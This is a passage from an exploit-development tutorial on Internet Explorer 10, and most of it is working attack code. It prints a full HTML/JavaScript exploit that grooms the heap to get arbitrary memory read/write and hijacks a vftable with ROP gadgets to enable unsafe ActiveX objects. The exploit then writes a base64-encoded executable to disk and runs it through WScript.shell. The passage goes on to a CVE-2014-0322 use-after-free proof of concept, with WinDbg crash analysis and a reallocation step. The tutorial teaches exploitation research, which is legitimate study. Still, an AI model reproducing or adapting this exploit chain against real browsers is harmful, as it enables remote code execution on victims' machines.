. Let’s see if we can reach the string 
http://127.0.0.1
, which is the one we’d like to 
modify:
 
0:007> ? poi(3663f40+50)
 
Evaluate expression: 244101928 = 0e8cb328
 
0:007> du poi(0e8cb328+44)
 
04e5ff14  "http://127.0.0.1/"
 
Perfect!
 
Now we must determi
ne the exact bytes we want to overwrite the original string with. Here’s an easy way of 
doing that:
 
0:007> ezu 04e5ff14 "C:
\
\
"
 
0:007> dd 04e5ff14
 
04e5ff14  003a0043 0000005c 002f003a 0031002f
 
04e5ff24  00370032 0030002e 0030002e 0031002e
 
04e5ff34  0000002f
 00000000 00000000 58e7b7b9
 
04e5ff44  8e000000 00000000 bf26faff 001a8001
 
04e5ff54  00784700 00440041 0044004f 002e0042
 
04e5ff64  00740053 00650072 006d0061 df6c0000
 
04e5ff74  0000027d 58e7b7be 8c000000 00000000
 
04e5ff84  00c6d95d 001c8001 00784300 0053005
7
 
So we need to overwrite the string with 
003a0043 0000005c
.
 
Change the code as follows:
 
JavaScript
 
 
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
var
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADOD
B.Stream"
);
 
      
GodModeOff
();
 
      
tStream
.
Type
 
=
 
2
;
       
// text
 
      
bStream
.
Type
 
=
 
1
;
       
// binary
 
      
tStream
.
Open
();
 
      
bStream
.
Open
();
 
      
tStream
.
WriteText
(
data
);
 
      
tStream
.
Position
 
=
 
2
;
       
// skips the first 2 bytes in 
the tStream (what are they?)
 
      
tStream
.
CopyTo
(
bStream
);
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 431 
-
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
write
(
string_addr
,
 
0x003a0043
);
       
// 'C:'
 
      
write
(
string_addr
 
+
 
4
,
 
0x0000005c
);
   
// '
\
'
 
      
bStream
.
SaveToFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
tStream
.
Close
();
 
      
bStream
.
Close
();
 
    
}
 
 
Load the page in IE and, finally, everything should work fine!
 
Here’s the complete code fo
r your convenience:
 
XHTML
 
 
<html>
 
<head>
 
<script
 language=
"javascript"
>
 
  
(
function
()
 
{
 
    
alert
(
"Starting!"
);
 
    
CollectGarbage
();
 
 
//
-----------------------------------------------------
 
    
// From one
-
byte
-
write to full process space read/w
rite
 
    
//
-----------------------------------------------------
 
    
a
 
=
 
new
 
Array
();
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// 8
-
byte header | 0x58
-
byte ArrayBuffer (buf)
 
    
// 8
-
byte header | 0x58
-
byte LargeHeapBlock
 
    
// .
 
    
// .
 
    
// .
 
    
for
 
(
i
 
=
 
0
;
 
i
 
<
 
0x300
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3c00
);
 
      
if
 
(
i
 
==
 
0x100
)
 
        
buf
 
=
 
new
 
ArrayBuffer
(
0x58
);
      
// must be exactly 0x58!
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
a
[
i
].
length
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
0x123
;
 
    
}
 
    
//    0x0:  ArrayDataHead
 
    
//   0x20:  array[0] address
 
    
//   0x24:  array[1] address
 
    
//   .
..
 
    
// 0xf000:  Int32Array
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 432 
-
 
    
// 0xf030:  Int32Array
 
    
//   ...
 
    
// 0xffc0:  Int32Array
 
    
// 0xfff0:  align data
 
    
for
 
(;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
 
      
a
[
i
]
 
=
 
new
 
Array
(
0x3bf8
)
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
        
a
[
i
][
j
]
 
=
 
new
 
Int32Arra
y
(
buf
)
 
    
}
 
    
//            vftptr
 
    
// 0c0af000: 70583b60 031c98a0 00000000 00000003 00000004 00000000 20000016 08ce0020
 
    
// 0c0af020: 03133de0                                             array_len buf_addr
 
    
//          jsArrayBuf
 
    
aler
t
(
"Set byte at 0c0af01b to 0x20"
);
 
    
// Now let's find the Int32Array whose length we modified.
 
    
int32array
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x300
;
 
i
 
<
 
0x300
 
+
 
0x400
;
 
++
i
)
 
{
 
      
for
 
(
j
 
=
 
0
;
 
j
 
<
 
0x55
;
 
++
j
)
 
{
 
        
if
 
(
a
[
i
][
j
].
length
 
!=
 
0x58
/
4
)
 
{
 
          
in
t32array
 
=
 
a
[
i
][
j
];
 
          
break
;
 
        
}
 
      
}
 
      
if
 
(
int32array
 
!=
 
0
)
 
        
break
;
 
    
}
 
    
if
 
(
int32array
 
==
 
0
)
 
{
 
      
alert
(
"Can't find int32array!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
 
    
// This is just an example
.
 
    
// The buffer of int32array starts at 03c1f178 and is 0x58 bytes.
 
    
// The next LargeHeapBlock, preceded by 8 bytes of header, starts at 03c1f1d8.
 
    
// The value in parentheses, at 03c1f178+0x60+0x24, points to the following
 
    
// LargeHeapBlock
.
 
    
//
 
    
// 03c1f178: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f198: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000
 
    
// 03c1f1b8: 00000000 00000000 00000000 00000000 00000000 0000000
0 014829e8 8c000000
 
    
// 03c1f1d8: 70796e18 00000003 08100000 00000010 00000001 00000000 00000004 0810f020
 
    
// 03c1f1f8: 08110000(03c1f238)00000000 00000001 00000001 00000000 03c15b40 08100000
 
    
// 03c1f218: 00000000 00000000 00000000 00000004 00000
001 00000000 01482994 8c000000
 
    
// 03c1f238: ...
 
 
// We check that the structure above is correct (we check the first LargeHeapBlocks).
 
    
// 70796e18 = jscript9!LargeHeapBlock::`vftable' = jscript9 + 0x6e18
 
    
var
 
vftptr1
 
=
 
int32array
[
0x60
/
4
],
 
 
vftptr2
 
=
 
int32array
[
0x60
*
2
/
4
],
 
        
vftptr3
 
=
 
int32array
[
0x60
*
3
/
4
],
 
        
nextPtr1
 
=
 
int32array
[(
0x60
+
0x24
)/
4
],
 
        
nextPtr2
 
=
 
int32array
[(
0x60
*
2
+
0x24
)/
4
],
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 433 
-
 
        
nextPtr3
 
=
 
int32array
[(
0x60
*
3
+
0x24
)/
4
];
 
    
if
 
(
vftptr1
 
&
 
0xffff
 
!=
 
0x6e18
 
||
 
vftptr1
 
!=
 
vftptr2
 
||
 
vftptr2
 
!=
 
vftptr3
 
||
 
        
nextPtr2
 
-
 
nextPtr1
 
!=
 
0x60
 
||
 
nextPtr3
 
-
 
nextPtr2
 
!=
 
0x60
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
  
 
buf_addr
 
=
 
nextPtr1
 
-
 
0x60
*
2
;
 
    
// Now we modi
fy int32array again to gain full address space read/write access.
 
    
if
 
(
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
!=
 
buf_addr
)
 
{
 
      
alert
(
"Error!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
  
 
int32array
[(
0x0c0af000
+
0x18
 
-
 
buf_addr
)/
4
]
 
=
 
0x20000000
;
        
// new length
 
    
int32array
[(
0x0c0af000
+
0x1c
 
-
 
buf_addr
)/
4
]
 
=
 
0
;
                 
// new buffer address
 
    
function
 
read
(
address
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
return
 
int32array
[
address
/
4
];
 
 
}
 
      
else
 
{
 
        
alert
(
"to debug"
);
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
return
 
(
int32array
[(
address
-
k
)/
4
]
 
>>
 
k
*
8
)
 
|
 
               
(
int32array
[(
address
-
k
+
4
)/
4
]
 
<<
 
(
32
 
-
 
k
*
8
));
 
      
}
 
    
}
 
    
function
 
write
(
address
,
 
val
ue
)
 
{
 
      
var
 
k
 
=
 
address
 
&
 
3
;
 
      
if
 
(
k
 
==
 
0
)
 
{
 
        
// ####
 
        
int32array
[
address
/
4
]
 
=
 
value
;
 
      
}
 
      
else
 
{
 
        
// .### #... or ..## ##.. or ...# ###.
 
        
alert
(
"to debug"
);
 
        
var
 
low
 
=
 
int32array
[(
address
-
k
)/
4
];
 
        
var
 
high
 
=
 
int32array
[(
address
-
k
+
4
)/
4
];
 
        
var
 
mask
 
=
 
(
1
 
<<
 
k
*
8
)
 
-
 
1
;
  
// 0xff or 0xffff or 0xffffff
 
        
low
 
=
 
(
low
 
&
 
mask
)
 
|
 
(
value
 
<<
 
k
*
8
);
 
        
high
 
=
 
(
high
 
&
 
(
0xffffffff
 
-
 
mask
))
 
|
 
(
value
 
>>
 
(
32
 
-
 
k
*
8
));
 
        
int32array
[(
address
-
k
)/
4
]
 
=
 
low
;
 
        
int32array
[(
address
-
k
+
4
)/
4
]
 
=
 
high
;
 
      
}
 
    
}
 
    
//
---------
 
    
// God mode
 
    
//
---------
 
    
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 434 
-
 
    
// At 0c0af000 we can read the vfptr of an Int32Array:
 
    
//   jscript9!Js::TypedArray<int>::`vftable' @ jscript9+3b60
 
    
jscript
9
 
=
 
read
(
0x0c0af000
)
 
-
 
0x3b60
;
 
    
// Now we need to determine the base address of MSHTML. We can create an HTML
 
    
// object and write its reference to the address 0x0c0af000
-
4 which corresponds
 
    
// to the last element of one of our arrays.
 
    
/
/ Let's find the array at 0x0c0af000
-
4.
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
      
a
[
i
][
0x3bf7
]
 
=
 
0
;
 
    
// We write 3 in the last position of one of our arrays. IE encodes the number x
 
    
// as 2*x+1 so that it can tell addresses (dword 
aligned) and numbers apart.
 
    
// Either we use an odd number or a valid address otherwise IE will crash in the
 
    
// following for loop.
 
    
write
(
0x0c0af000
-
4
,
 
3
);
 
    
leakArray
 
=
 
0
;
 
    
for
 
(
i
 
=
 
0x200
;
 
i
 
<
 
0x200
 
+
 
0x400
;
 
++
i
)
 
{
 
      
if
 
(
a
[
i
][
0x3bf7
]
 
!=
 
0
)
 
{
 
        
leakArray
 
=
 
a
[
i
];
 
        
break
;
 
      
}
 
    
}
 
    
if
 
(
leakArray
 
==
 
0
)
 
{
 
      
alert
(
"Can't find leakArray!"
);
 
      
window.location.reload
();
 
      
return
;
 
    
}
 
    
function
 
get_addr
(
obj
)
 
{
 
      
leakArray
[
0x3bf7
]
 
=
 
obj
;
 
      
return
 
read
(
0x0c0af000
-
4
,
 
obj
);
 
    
}
 
    
// Back to determining the base address of MSHTML...
 
    
// Here's the beginning of the element div:
 
    
//      +
-----
 jscript9!Projection::ArrayObjectInstance::`vftable'
 
    
//      v
 
    
//   70792248 0c012b40 00
000000 00000003
 
    
//   73b38b9a 00000000 00574230 00000000
 
    
//      ^
 
    
//      +
----
 MSHTML!CBaseTypeOperations::CBaseFinalizer = mshtml + 0x58b9a
 
    
var
 
addr
 
=
 
get_addr
(
document.createElement
(
"div"
));
 
    
mshtml
 
=
 
read
(
addr
 
+
 
0x10
)
 
-
 
0x58b9a
;
 
 
//                                                  vftable
 
    
//                                    +
-----
> +
------------------
+
 
    
//                                    |       |                  |
 
    
//                                    |       |
                  |
 
    
//                                    |  0x10:| jscript9+0x10705e| 
--
> "XCHG EAX,ESP | ADD EAX,71F84DC0 |
 
    
//                                    |       |                  |      MOV EAX,ESI | POP ESI | RETN"
 
    
//              
                      |  0x14:| jscript9+0xdc164 | 
--
> "LEAVE | RET 4"
 
    
//                                    |       +
------------------
+
 
    
//                 object             |
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 435 
-
 
    
// EAX 
---
> +
-------------------
+     |
 
    
//          | vftptr  
          |
-----
+
 
    
//          | jscript9+0x15f800 | 
--
> "XOR EAX,EAX | RETN"
 
    
//          | jscript9+0xf3baf  | 
--
> "XCHG EAX,EDI | RETN"
 
    
//          | jscript9+0xdc361  | 
--
> "LEAVE | RET 4"
 
    
//          +
-------------------
+
 
 
var
 
old
 
=
 
read
(
mshtml
+
0xc555e0
+
0x14
);
 
 
write
(
mshtml
+
0xc555e0
+
0x14
,
 
jscript9
+
0xdc164
);
      
// God Mode On!
 
    
var
 
shell
 
=
 
new
 
ActiveXObject
(
"WScript.shell"
);
 
    
write
(
mshtml
+
0xc555e0
+
0x14
,
 
old
);
                   
// God Mode Off!
 
 
addr
 
=
 
get_addr
(
Active
XObject
);
 
    
var
 
pp_obj
 
=
 
read
(
read
(
addr
 
+
 
0x28
)
 
+
 
4
)
 
+
 
0x1f0
;
       
// ptr to ptr to object
 
    
var
 
old_objptr
 
=
 
read
(
pp_obj
);
 
    
var
 
old_vftptr
 
=
 
read
(
old_objptr
);
 
    
// Create the new vftable.
 
    
var
 
new_vftable
 
=
 
new
 
Int32Array
(
0x708
/
4
);
 
    
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
new_vftable.length
;
 
++
i
)
 
      
new_vftable
[
i
]
 
=
 
read
(
old_vftptr
 
+
 
i
*
4
);
 
    
new_vftable
[
0x10
/
4
]
 
=
 
jscript9
+
0x10705e
;
 
    
new_vftable
[
0x14
/
4
]
 
=
 
jscript9
+
0xdc164
;
 
    
var
 
new_vftptr
 
=
 
read
(
get_addr
(
new_vftable
)
 
+
 
0x1c
);
        
// ptr 
to raw buffer of new_vftable
 
    
// Create the new object.
 
    
var
 
new_object
 
=
 
new
 
Int32Array
(
4
);
 
    
new_object
[
0
]
 
=
 
new_vftptr
;
 
    
new_object
[
1
]
 
=
 
jscript9
 
+
 
0x15f800
;
 
    
new_object
[
2
]
 
=
 
jscript9
 
+
 
0xf3baf
;
 
    
new_object
[
3
]
 
=
 
jscript9
 
+
 
0xdc361
;
 
    
var
 
new_objptr
 
=
 
read
(
get_addr
(
new_object
)
 
+
 
0x1c
);
         
// ptr to raw buffer of new_object
 
    
function
 
GodModeOn
()
 
{
 
      
write
(
pp_obj
,
 
new_objptr
);
 
    
}
 
    
function
 
GodModeOff
()
 
{
 
      
write
(
pp_obj
,
 
old_objptr
);
 
    
}
 
    
// c
ontent of exe file encoded in base64.
 
    
runcalc
 
=
 
'TVqQAAMAAAAEAAAA//8AALgAAAAAAAAA <snipped> AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA'
;
 
    
function
 
createExe
(
fname
,
 
data
)
 
{
 
      
GodModeOn
();
 
      
var
 
tStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
v
ar
 
bStream
 
=
 
new
 
ActiveXObject
(
"ADODB.Stream"
);
 
      
GodModeOff
();
 
      
tStream.Type
 
=
 
2
;
       
// text
 
      
bStream.Type
 
=
 
1
;
       
// binary
 
      
tStream.Open
();
 
      
bStream.Open
();
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 436 
-
 
      
tStream.WriteText
(
data
);
 
      
tStream.Position
 
=
 
2
;
 
      
// skips the first 2 bytes in the tStream (what are they?)
 
      
tStream.CopyTo
(
bStream
);
 
      
var
 
bStream_addr
 
=
 
get_addr
(
bStream
);
 
      
var
 
string_addr
 
=
 
read
(
read
(
bStream_addr
 
+
 
0x50
)
 
+
 
0x44
);
 
      
write
(
string_addr
,
 
0x003a0043
);
       
/
/ 'C:'
 
      
write
(
string_addr
 
+
 
4
,
 
0x0000005c
);
   
// '
\
'
 
      
bStream.SaveToFile
(
fname
,
 
2
);
     
// 2 = overwrites file if it already exists
 
      
tStream.Close
();
 
      
bStream.Close
();
 
    
}
 
    
function
 
decode
(
b64Data
)
 
{
 
      
var
 
data
 
=
 
wi
ndow.atob
(
b64Data
);
 
      
// Now data is like
 
      
//   11 00 12 00 45 00 50 00 ...
 
      
// rather than like
 
      
//   11 12 45 50 ...
 
      
// Let's fix this!
 
      
var
 
arr
 
=
 
new
 
Array
();
 
      
for
 
(
var
 
i
 
=
 
0
;
 
i
 
<
 
data.length
 
/
 
2
;
 
++
i
)
 
{
 
      
var
 
low
 
=
 
data.charCodeAt
(
i
*
2
);
 
        
var
 
high
 
=
 
data.charCodeAt
(
i
*
2
 
+
 
1
);
 
        
arr.push
(
String.fromCharCode
(
low
 
+
 
high
 
*
 
0x100
));
 
      
}
 
      
return
 
arr.join
(
''
);
 
    
}
 
 
fname
 
=
 
shell.ExpandEnvironmentStrings
(
"%TEMP%
\
\
runcalc.exe"
);
 
    
crea
teExe
(
fname
,
 
decode
(
runcalc
));
 
    
shell.Exec
(
fname
);
 
 
alert
(
"All done!"
);
 
  
})();
 
 
</script>
 
</head>
 
<body>
 
</body>
 
</html>
 
 
As before, I snipped 
runcalc
. You can download the full code from here: 
code3
.
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 437 
-
 
IE10: Use
-
After
-
Free bug
 
 
Until now, we have depende
d on 
WinDbg
 for modifying the length of an 
Int32Array
 to acquire full read/write 
access to the space address of the 
IE
 process. It’s high time we found a 
UAF
 to complete our 
exploit
.
 
I chose the UAF with code 
CVE
-
2014
-
0322
. You can google for it if you wan
t additional information. Here’s 
the 
POC
 to produce the 
crash
:
 
XHTML
 
 
<!
--
 CVE
-
2014
-
0322 
--
>
 
<html>
 
<head>
 
</head>
 
<body>
 
<script>
 
function
 
handler
()
 
{
 
  
this.outerHTML
 
=
 
this.outerHTML
;
 
}
 
 
function
 
trigger
()
 
{
 
    
var
 
a
 
=
 
document.getElementsByTagName
(
"s
cript"
)[
0
];
 
    
a.onpropertychange
 
=
 
handler
;
 
    
var
 
b
 
=
 
document.createElement
(
"div"
);
 
    
b
 
=
 
a.appendChild
(
b
);
 
}
 
 
trigger
();
 
</script>
 
</body>
 
</html>
 
 
Copy and paste that code in an HTML file and open it in IE 10. If you do this, you’ll discover that
 IE doesn’t 
crash. What’s wrong?
 
GFlags
 
In the same directory as 
WinDbg
, we can find 
gflags.exe
, a utility which can be used to change the 
Global 
Flags
 of Windows. These flags influence the behavior of Windows and can be immensely helpful during 
debugging.
 We’re especially interested in two flags:
 
1
.
 
HPA
 
–
 
H
eap 
P
age 
A
llocator
 
2
.
 
UST
 
–
 
U
ser mode 
S
tack 
T
race
 
The flag HPA tells Windows to use a special version of the heap allocator that’s useful to detect UAF, buffer 
overflows and other kinds of bugs. It works by al
locating each block in a separate set of contiguous pages 
(how many depends on the length of the block) so that the end of the block coincides with the end of the last 
page. The first page after the allocated block is marked as 
not present
. This way, buffe
r overflows are easily 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 438 
-
 
and efficiently detectable. Moreover, when a block is deallocated, all the pages containing it are marked as 
not present
. This makes UAF easy to detect.
 
Look at the following picture:
 
 
A page is 
0x1000
 bytes = 
4 KB
. If the allocated block is less than 
4 KB
, its size can be easily determined 
from its address with this simple formula:
 
size(addr) = 0x1000 
-
 (addr &
 0xfff)
 
This formula works because the block is allocated at the end of the page containing it. Have a look at the 
following picture:
 
 
The second flag, UST, tells Windows to save a 
stack trace
 of the current stack whenever a heap block is 
allocated or deallocated. This is useful to see which function and path of execution led to a particular 
allocation or deallocation. We’ll see an ex
ample during the analysis of the UAF bug.
 
Global flags can be changed either 
globally
 or on a 
per image file basis
. We’re interested in enabling the 
flags HPA and UST just for 
iexplore.exe
 so we’re going to choose the latter.
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 439 
-
 
Run 
gflags.exe
, go to the tab 
Image File
, insert the image name and select the two flags as illustrated in the 
following picture:
 
 
Getting the crash
 
Now load the
 POC in IE and you should get a crash. If we do the same while debugging IE in WinDbg, we’ll 
see which instruction generates the exception:
 
6b900fc4 e83669e6ff      call    MSHTML!CTreePos::SourceIndex (6b7678ff)
 
6b900fc9 8d45a8          lea     eax,[ebp
-
5
8h]
 
6b900fcc 50              push    eax
 
6b900fcd 8bce            mov     ecx,esi
 
6b900fcf c745a804000000  mov     dword ptr [ebp
-
58h],4
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 440 
-
 
6b900fd6 c745c400000000  mov     dword ptr [ebp
-
3Ch],0
 
6b900fdd c745ac00000000  mov     dword ptr [ebp
-
54h],0
 
6b900fe4 
c745c028000000  mov     dword ptr [ebp
-
40h],28h
 
6b900feb c745b400000000  mov     dword ptr [ebp
-
4Ch],0
 
6b900ff2 c745b000000000  mov     dword ptr [ebp
-
50h],0
 
6b900ff9 c745b8ffffffff  mov     dword ptr [ebp
-
48h],0FFFFFFFFh
 
6b901000 c745bcffffffff  mov     d
word ptr [ebp
-
44h],0FFFFFFFFh
 
6b901007 e80162e6ff      call    MSHTML!CMarkup::Notify (6b76720d)
 
6b90100c ff4678          inc     dword ptr [esi+78h]  ds:002b:0e12dd38=????????     <
---------------------
 
6b90100f 838e6001000004  or      dword ptr [esi+160h
],4
 
6b901016 8bd6            mov     edx,esi
 
6b901018 e8640b0600      call    MSHTML!CMarkup::UpdateMarkupContentsVersion (6b961b81)
 
6b90101d 8b8698000000    mov     eax,dword ptr [esi+98h]
 
6b901023 85c0            test    eax,eax
 
6b901025 7416            
je      MSHTML!CMarkup::NotifyElementEnterTree+0x297 (6b90103d)
 
6b901027 81bea4010000905f0100 cmp dword ptr [esi+1A4h],15F90h
 
6b901031 7c0a            jl      MSHTML!CMarkup::NotifyElementEnterTree+0x297 (6b90103d)
 
6b901033 8b4008          mov     eax,dwor
d ptr [eax+8]
 
6b901036 83a0f0020000bf  and     dword ptr [eax+2F0h],0FFFFFFBFh
 
6b90103d 8d7dd8          lea     edi,[ebp
-
28h]
 
It looks like 
ESI
 is a 
dangling pointer
.
 
Here’s the stack trace:
 
0:007> k 10
 
ChildEBP RetAddr  
 
0a10b988 6b90177b MSHTML!CMarkup::
NotifyElementEnterTree+0x266
 
0a10b9cc 6b9015ef MSHTML!CMarkup::InsertSingleElement+0x169
 
0a10baac 6b901334 MSHTML!CMarkup::InsertElementInternalNoInclusions+0x11d
 
0a10bad0 6b9012f6 MSHTML!CMarkup::InsertElementInternal+0x2e
 
0a10bb10 6b901393 MSHTML!CDoc::I
nsertElement+0x9c
 
0a10bbd8 6b7d0420 MSHTML!InsertDOMNodeHelper+0x454
 
0a10bc50 6b7d011c MSHTML!CElement::InsertBeforeHelper+0x2a8
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 441 
-
 
0a10bcb4 6b7d083c MSHTML!CElement::InsertBeforeHelper+0xe4
 
0a10bcd4 6b7d2de4 MSHTML!CElement::InsertBefore+0x36
 
0a10bd60 6b7d2d
01 MSHTML!CElement::Var_appendChild+0xc7
 
0a10bd90 0c17847a MSHTML!CFastDOM::CNode::Trampoline_appendChild+0x55
 
0a10bdf8 0c176865 jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x185
 
0a10bf94 0c175cf5 jscript9!Js::InterpreterStackFrame::Proc
ess+0x9d4
 
0a10c0b4 09ee0fe1 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x305
 
WARNING: Frame IP not in any known module. Following frames may be wrong.
 
0a10c0c0 0c1764ff 0x9ee0fe1
 
0a10c254 0c175cf5 jscript9!Js::InterpreterStackFrame::Process+0x
1b57
 
Let’s determine the size of the (now freed) object:
 
0:007> ? 1000 
-
 (@esi & fff)
 
Evaluate expression: 832 = 00000340
 
Of course, we’re assuming that the object size is less than 
0x1000
. Finally, here’s an example of stack trace 
available thanks to the 
UST flag:
 
0:007> !heap 
-
p 
-
a @esi
 
    address 0e12dcc0 found in
 
    _DPH_HEAP_ROOT @ 141000
 
    in free
-
ed allocation (  DPH_HEAP_BLOCK:         VirtAddr         VirtSize)
 
                                    e2d0b94:          e12d000             2000
 
    7
33990b2 verifier!AVrfDebugPageHeapFree+0x000000c2
 
    772b1564 ntdll!RtlDebugFreeHeap+0x0000002f
 
    7726ac29 ntdll!RtlpFreeHeap+0x0000005d
 
    772134a2 ntdll!RtlFreeHeap+0x00000142
 
    74f414ad kernel32!HeapFree+0x00000014
 
    6b778f06 MSHTML!CMarkup::`ve
ctor deleting destructor'+0x00000026
 
    6b7455da MSHTML!CBase::SubRelease+0x0000002e
 
    6b774183 MSHTML!CMarkup::Release+0x0000002d
 
    6bb414d1 MSHTML!InjectHtmlStream+0x00000716
 
    6bb41567 MSHTML!HandleHTMLInjection+0x00000082
 
    6bb3cfec MSHTML!CEl
ement::InjectInternal+0x00000506
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 442 
-
 
    6bb3d21d MSHTML!CElement::InjectTextOrHTML+0x000001a4
 
    6ba2ea80 MSHTML!CElement::put_outerHTML+0x0000001d      <
----------------------------------
 
    6bd3309c MSHTML!CFastDOM::CHTMLElement::Trampoline_Set_outerHTML+
0x00000054    <
---------------------
 
    0c17847a jscript9!Js::JavascriptExternalFunction::ExternalFunctionThunk+0x00000185
 
    0c1792c5 jscript9!Js::JavascriptArray::GetSetter+0x000000cf
 
    0c1d6c56 jscript9!Js::InterpreterStackFrame::OP_ProfiledSetPrope
rty<0,Js::OpLayoutElementCP_OneByte>+0x000005
a8
 
    0c1ac53b jscript9!Js::InterpreterStackFrame::Process+0x00000fbf
 
    0c175cf5 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x00000305
 
This proves that 
ESI
 is indeed a dangling pointer. The names
 of the functions suggest that the object is 
deallocated while executing the assignment
 
this.outerHTML = this.outerHTML;
 
inside the function 
handler
. This means that we should allocate the new object to replace the old one in 
memory right after that assign
ment. We already saw how UAF bugs can be exploited in the 
chapter
 
exploitme5 (Heap spraying & UAF)
 so I won’t repeat the theory here.
 
What we need is to allocate an object of the same size of the d
eallocated object. This way, the new object 
will be allocated in the same portion of memory which the deallocated object occupied. We know that the 
object is 
0x340
 bytes, so we can create a 
null
-
terminated
 
Unicode
 string of 
0x340/2 
–
 1 = 0x19f = 415 
wchars
.
 
First of all, let’s pinpoint the exact point of crash:
 
0:007> !address @eip
 
 
Mapping file section regions...
 
Mapping module regions...
 
Mapping PEB regions...
 
Mapping TEB and stack regions...
 
Mapping heap regions...
 
M
apping page heap regions...
 
Mapping other regions...
 
Mapping stack trace database regions...
 
Mapping activation context regions...
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 443 
-
 
 
Usage:                  Image
 
Base Address:           6c4a1000
 
End Address:            6d0ef000
 
Region Size:            00c
4e000
 
State:                  00001000    MEM_COMMIT
 
Protect:                00000020    PAGE_EXECUTE_READ
 
Type:                   01000000    MEM_IMAGE
 
Allocation Base:        6c4a0000
 
Allocation Protect:     00000080    PAGE_EXECUTE_WRITECOPY
 
Image Path:
             C:
\
Windows
\
system32
\
MSHTML.dll
 
Module Name:            MSHTML
 
Loaded Image Name:      C:
\
Windows
\
system32
\
MSHTML.dll
 
Mapped Image Name:      
 
More info:              lmv m MSHTML
 
More info:              !lmi MSHTML
 
More info:              ln 0
x6c6c100c
 
More info:              !dh 0x6c4a0000
 
 
0:007> ? @eip
-
mshtml
 
Evaluate expression: 2232332 = 0022100c
 
So the exception is generated at
 mshtml + 0x22100c
. Now close WinDbg and IE, run them again, open the 
POC in IE and put a breakpoint on the cras
hing point in WinDbg:
 
bp mshtml + 0x22100c
 
Now allow the blocked content in IE and the breakpoint should be triggered right before the exception is 
generated. This was easy. This is not always the case. Sometimes the same piece of code is executed 
hundreds
 of times before the exception is generated.
 
Now we can try to allocate a new object of the right size. Let’s change the POC as follows:
 
XHTML
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 444 
-
 
<!
--
 CVE
-
2014
-
0322 
--
>
 
<html>
 
<head>
 
</head>
 
<body>
 
<script>
 
function
 
handler
()
 
{
 
  
this.outerHTML
 
=
 
this.outerH
TML
;
 
  
elem
 
=
 
document.createElement
(
"div"
);
 
  
elem.className
 
=
 
new
 
Array
(
416
).
join
(
"a"
);
        
// Nice trick to generate a string with 415 "a"
 
}
 
 
function
 
trigger
()
 
{
 
    
var
 
a
 
=
 
document.getElementsByTagName
(
"script"
)[
0
];
 
    
a.onpropertychange
 
=
 
handl
er
;
 
    
var
 
b
 
=
 
document.createElement
(
"div"
);
 
    
b
 
=
 
a.appendChild
(
b
);
 
}
 
 
trigger
();
 
</script>
 
</body>
 
</html>
 
 
Note the nice trick to create a string with 
415
 “
a
“!
 
Before opening the POC in IE, we need to disable the flags HPA and UST (UST is not a pro
blem, but let’s 
disable it anyway):
 
 
exploiT DevelopmenT CommuniTy
 
 
http://expdev
-
kiuhnm.rhcloud.com
 
 
-
 445 
-
 
 
Now let’s reopen the POC in IE, put a breakpoint at 
